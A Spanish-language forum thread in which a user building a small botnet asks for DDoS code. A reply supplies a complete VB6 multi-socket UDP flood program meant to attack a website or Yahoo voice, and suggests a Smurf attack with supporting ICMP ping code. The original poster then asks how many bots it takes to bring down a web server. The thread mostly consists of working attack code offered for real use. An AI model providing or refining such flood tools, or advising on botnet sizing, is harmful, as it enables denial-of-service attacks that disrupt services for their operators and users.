ddenial of service desde vb6 ?¿

[locot3]

Buenas ! y como siempre gracias por el tiempo , bueno al grano estoy en eso la construccion de una pequña botnet la cual cuenta con unos cuantos clientillos hehe, ahora el punt ode hacer todo es llegar  ahacercerle un ddos a algun server pero en realidad no e podido encontrar nada de nada sobre codigos de ejemplo de como hacer un ddos la teoria ya me la se de memoria y ya tengo masomenos entendio de como hacer algo pero tener un ejemplo seria genial , si alguien me peude postear algun pedazo de codigo o algo ais se le agradezeria mucho !!! y gracias de antemano saludos !!!!

[XcryptOR]

No se si te sirva esto de UDPFlood, la verdad es muy sencillo, utiliza el winsock pero se podria utilizar el socketmaster para no depender de componentes.

Código (VB) [Seleccionar] Expandir

'---------------------------------------------------------------------------------------
' Project   : prj_MultiSocketPortFlooder
' Module    : frmMain
' Author    : AMD64
' Date      : 7/26/2008
' Purpose   : Example using Vb6 to demonstrate how you could implement a multi-socketed UDP attack on a website or kill yahoo voice
' homepage  : http://www.voodowares.com
'---------------------------------------------------------------------------------------

' A few things i want to touch on.
' First notice the program will load and unload Sockets without the use of ON ERROR RESUME NEXT
' Now i suggest coding and adding error handling yourself , but this is to demonstrate that this method of loading and unloading sockets will differ from most any examples you'll find on yahoo related sites that deal with sockets, reason being PEOPLE COPY PASTE, :|
'-----------------
' Sub Load(object As object)
'   Member of VB.Global
'   Loads a form or control into memory.
'---
' Sub Unload(object As object)
'   Member of VB.Global
'   Unloads a form or control from memory.
'---
' Const sckUDPProtocol = 1
'   Member of MSWinsockLib.ProtocolConstants
'   UDP Protocol
'---
' Function ChrW$(CharCode As Long) As String
'   Member of VBA.Strings
'   Returns a string containing the specified native character (Unicode or ANSI)

Option Explicit

Private i As Integer

Private Sub btnExecute_Click()

Select Case btnExecute.Caption

    Case Is = ("Execute")
       
       For i = 1 To CInt(cboSockets.Text)
          Load Winsock(i)
          Next
         
          tmrNuke.Interval = CInt(cboTimeOut.Text)
          tmrNuke.Enabled = True
          btnExecute.Caption = ("Stop")
         
    Case Is = ("Stop")
               
        tmrNuke.Enabled = False
        tmrNuke.Interval = 0
               
        For i = 1 To Winsock.UBound
          Winsock(i).Close
          Unload Winsock(i)
          Next
          btnExecute.Caption = ("Execute")

End Select

End Sub

Private Sub tmrNuke_Timer()

  For i = 1 To Winsock().UBound
   
    With Winsock(i)
      .Close
      .Connect txtTarget.Text, CInt(txtPort.Text) '<---- could impliment a incremented integer value for the port to have a multi-socketed and multi-port attack , this concept is very simple :O|
      .SendData ASCIIFLOOD
    End With
    Debug.Print "SOCKET" & Chr(58) & Winsock(i).Index & vbNewLine & "SOCKET HANDLE" & Chr(58) & Winsock(i).SocketHandle & vbNewLine
  Next

End Sub
Public Function ASCIIFLOOD() As String
Dim X  As Byte

  X = Int(Rnd * 254) + 1
  ASCIIFLOOD = String(10500, ChrW$(X))
  ' add your own counter im lazy today :0|
End Function



[XcryptOR]

o puede usar un Smurf Attack: Envió de gran numero de ICMP echo (ping) a broadcast the IP.

aqui solo un ejemplo de ICMP ping:

Código (vb) [Seleccionar] Expandir

Private Sub Form_Load()
Dim Reply As ICMP_ECHO_REPLY
   Dim lngSuccess As Long
   Dim strIPAddress As String
   

   If SocketsInitialize() Then
     

    strIPAddress = "<ip to ping in here>"
   
    lngSuccess = ping(strIPAddress, Reply)
     

    MsgBox ("Address to Ping: " & strIPAddress)
    MsgBox ("Ping Response Message : " & EvaluatePingResponse(lngSuccess))
    MsgBox ("Time : " & Reply.RoundTripTime & " ms")
     

    SocketsCleanup
     
   Else
   

   Debug.Print WINSOCK_ERROR
   
   End If
End Sub

modulo

Código (vb) [Seleccionar] Expandir

Option Explicit


Private Const ICMP_SUCCESS As Long = 0
Private Const ICMP_STATUS_BUFFER_TO_SMALL = 11001
Private Const ICMP_STATUS_DESTINATION_NET_UNREACH = 11002
Private Const ICMP_STATUS_DESTINATION_HOST_UNREACH = 11003
Private Const ICMP_STATUS_DESTINATION_PROTOCOL_UNREACH = 11004
Private Const ICMP_STATUS_DESTINATION_PORT_UNREACH = 11005
Private Const ICMP_STATUS_NO_RESOURCE = 11006
Private Const ICMP_STATUS_BAD_OPTION = 11007
Private Const ICMP_STATUS_HARDWARE_ERROR = 11008
Private Const ICMP_STATUS_LARGE_PACKET = 11009
Private Const ICMP_STATUS_REQUEST_TIMED_OUT = 11010
Private Const ICMP_STATUS_BAD_REQUEST = 11011
Private Const ICMP_STATUS_BAD_ROUTE = 11012
Private Const ICMP_STATUS_TTL_EXPIRED_TRANSIT = 11013
Private Const ICMP_STATUS_TTL_EXPIRED_REASSEMBLY = 11014
Private Const ICMP_STATUS_PARAMETER = 11015
Private Const ICMP_STATUS_SOURCE_QUENCH = 11016
Private Const ICMP_STATUS_OPTION_TOO_BIG = 11017
Private Const ICMP_STATUS_BAD_DESTINATION = 11018
Private Const ICMP_STATUS_NEGOTIATING_IPSEC = 11032
Private Const ICMP_STATUS_GENERAL_FAILURE = 11050

Public Const WINSOCK_ERROR = "Windows Sockets not responding correctly."
Public Const INADDR_NONE As Long = &HFFFFFFFF
Public Const WSA_SUCCESS = 0
Public Const WS_VERSION_REQD As Long = &H101


Private Declare Function WSACleanup Lib "WSOCK32.DLL" () As Long


Private Declare Function WSAStartup Lib "WSOCK32.DLL" (ByVal wVersionRequired As Long, lpWSADATA As WSADATA) As Long

Private Declare Function IcmpCreateFile Lib "icmp.dll" () As Long


Private Declare Function inet_addr Lib "WSOCK32.DLL" (ByVal cp As String) As Long


Private Declare Function IcmpCloseHandle Lib "icmp.dll" (ByVal IcmpHandle As Long) As Long

Private Type WSADATA
   wVersion As Integer
   wHighVersion As Integer
   szDescription(0 To 256) As Byte
   szSystemStatus(0 To 128) As Byte
   iMaxSockets As Long
   iMaxUDPDG As Long
   lpVendorInfo As Long
End Type


Private Declare Function IcmpSendEcho Lib "icmp.dll" _
   (ByVal IcmpHandle As Long, _
    ByVal DestinationAddress As Long, _
    ByVal RequestData As String, _
    ByVal RequestSize As Long, _
    ByVal RequestOptions As Long, _
    ReplyBuffer As ICMP_ECHO_REPLY, _
    ByVal ReplySize As Long, _
    ByVal Timeout As Long) As Long

Private Type IP_OPTION_INFORMATION
   Ttl             As Byte
   Tos             As Byte
   Flags           As Byte
   OptionsSize     As Byte
   OptionsData     As Long
End Type


Public Type ICMP_ECHO_REPLY
   address         As Long
   Status          As Long
   RoundTripTime   As Long
   DataSize        As Long
   Reserved        As Integer
   ptrData                 As Long
   Options        As IP_OPTION_INFORMATION
   Data            As String * 250
End Type


Public Function ping(sAddress As String, Reply As ICMP_ECHO_REPLY) As Long

Dim hIcmp As Long
Dim lAddress As Long
Dim lTimeOut As Long
Dim StringToSend As String


StringToSend = "hello"


lTimeOut = 1000


lAddress = inet_addr(sAddress)

If (lAddress <> -1) And (lAddress <> 0) Then
       

    hIcmp = IcmpCreateFile()
   
    If hIcmp Then

        Call IcmpSendEcho(hIcmp, lAddress, StringToSend, Len(StringToSend), 0, Reply, Len(Reply), lTimeOut)


        ping = Reply.Status

        IcmpCloseHandle hIcmp
    Else
        Debug.Print "failure opening icmp handle."
        ping = -1
    End If
Else
    ping = -1
End If

End Function


Public Sub SocketsCleanup()
   
   WSACleanup
   
End Sub

Public Function SocketsInitialize() As Boolean

   Dim WSAD As WSADATA

   SocketsInitialize = WSAStartup(WS_VERSION_REQD, WSAD) = ICMP_SUCCESS

End Function



Public Function EvaluatePingResponse(PingResponse As Long) As String

  Select Case PingResponse

  Case ICMP_SUCCESS: EvaluatePingResponse = "Success!"
           

  Case ICMP_STATUS_BUFFER_TO_SMALL:    EvaluatePingResponse = "Buffer Too Small"
  Case ICMP_STATUS_DESTINATION_NET_UNREACH: EvaluatePingResponse = "Destination Net Unreachable"
  Case ICMP_STATUS_DESTINATION_HOST_UNREACH: EvaluatePingResponse = "Destination Host Unreachable"
  Case ICMP_STATUS_DESTINATION_PROTOCOL_UNREACH: EvaluatePingResponse = "Destination Protocol Unreachable"
  Case ICMP_STATUS_DESTINATION_PORT_UNREACH: EvaluatePingResponse = "Destination Port Unreachable"
  Case ICMP_STATUS_NO_RESOURCE: EvaluatePingResponse = "No Resources"
  Case ICMP_STATUS_BAD_OPTION: EvaluatePingResponse = "Bad Option"
  Case ICMP_STATUS_HARDWARE_ERROR: EvaluatePingResponse = "Hardware Error"
  Case ICMP_STATUS_LARGE_PACKET: EvaluatePingResponse = "Packet Too Big"
  Case ICMP_STATUS_REQUEST_TIMED_OUT: EvaluatePingResponse = "Request Timed Out"
  Case ICMP_STATUS_BAD_REQUEST: EvaluatePingResponse = "Bad Request"
  Case ICMP_STATUS_BAD_ROUTE: EvaluatePingResponse = "Bad Route"
  Case ICMP_STATUS_TTL_EXPIRED_TRANSIT: EvaluatePingResponse = "TimeToLive Expired Transit"
  Case ICMP_STATUS_TTL_EXPIRED_REASSEMBLY: EvaluatePingResponse = "TimeToLive Expired Reassembly"
  Case ICMP_STATUS_PARAMETER: EvaluatePingResponse = "Parameter Problem"
  Case ICMP_STATUS_SOURCE_QUENCH: EvaluatePingResponse = "Source Quench"
  Case ICMP_STATUS_OPTION_TOO_BIG: EvaluatePingResponse = "Option Too Big"
  Case ICMP_STATUS_BAD_DESTINATION: EvaluatePingResponse = "Bad Destination"
  Case ICMP_STATUS_NEGOTIATING_IPSEC: EvaluatePingResponse = "Negotiating IPSEC"
  Case ICMP_STATUS_GENERAL_FAILURE: EvaluatePingResponse = "General Failure"
           

  Case Else: EvaluatePingResponse = "Unknown Response"
       
  End Select

End Function
       


[locot3]

MUCHISIMAS GRACIAS AHORA  A programamAR !! hah ahor anose por cual de lso 2 metodos irme me podrian decir cual es el metodo mas aconsejable a usar de los 2 ejemplos anteriores y masomenos haciendo calculos rapidos cuantos bots nesecitaria en cada caso para realizar un atake decente como para tirarse un servidor web simple ?¿?¿en algun lado lei que con un troyano de por ahi se podia hasta con solo 5! bots en otro gusano de por ahi que nesecitava como 22 o 23 bots para hacer caer los servicios de un servidor (Claro que hablamos de un servicor web con 1 solo servidor de acceso y no a una red de servidores como yahoo.com porejemplo)espero ansioso las repsuestas me despido agradeciendoles otra ves GRACIAS !! haha